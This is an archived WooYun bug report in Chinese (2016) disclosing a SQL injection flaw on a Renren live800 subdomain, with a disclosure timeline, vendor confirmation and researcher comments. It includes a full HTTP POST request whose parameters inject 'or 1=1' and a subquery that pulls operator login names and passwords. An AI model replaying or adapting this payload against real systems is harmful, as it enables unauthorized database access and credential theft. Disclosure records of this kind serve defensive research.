人人网某站SQL注射漏洞

编号202904
Urlhttp://www.wooyun.org/bug.php?action=view&id=202904
漏洞状态厂商已经确认
漏洞标题人人网某站SQL注射漏洞
漏洞类型SQL注射漏洞
厂商人人网
白帽子whynot
提交日期2016-04-28 10:30:00
公开日期2016-06-12 11:10:00
修复时间(not set)
确认时间2016-04-28 00:00:00
Confirm Spend0
漏洞标签注射技巧
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank6
漏洞简介
又来了 赶紧刷个分 心动了 好几十块钱呢。
漏洞细节

http://wooyun.org/bugs/wooyun-2016-0177871 今天看漏洞 提醒公开了 各种大厂商啊、

POST /live800/sta/export/referrerSta.jsp HTTP/1.1
Host: live800.wan.renren.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 184
export=csv&vn=dataAnalyseAdapter_referrer&operatorId=&fromTime=2016-02-21&toTime=2016-02-22&companyId=1 or 1=1&subStrSql=(select group_concat(login_name,0x3a,password) from operator)


后台在内网 所以就没在尝试了

12.png


24.png

POC

12.png


</code>

24.png

修复方案

修复。

状态信息 2016-04-28: 细节已通知厂商并且等待厂商处理中
2016-04-28: 厂商已经确认,细节仅向厂商公开
2016-05-08: 细节向核心白帽子及相关领域专家公开
2016-05-18: 细节向普通白帽子公开
2016-05-28: 细节向实习白帽子公开
2016-06-12: 细节向公众公开
厂商回复感谢
回应信息危害等级:中漏洞Rank:6 确认时间:2016-04-28 11:04
Showing 1-2 of 2 items.
评论内容评论人点赞数评论时间

@faith 感觉乌云首看技术 然后是重要性 我这个站没什么技术 不过应该是比较重要的站

whynot02016-04-28 11:05:00

你的就可以上首页,我的就没上。心碎

faith02016-04-28 10:53:00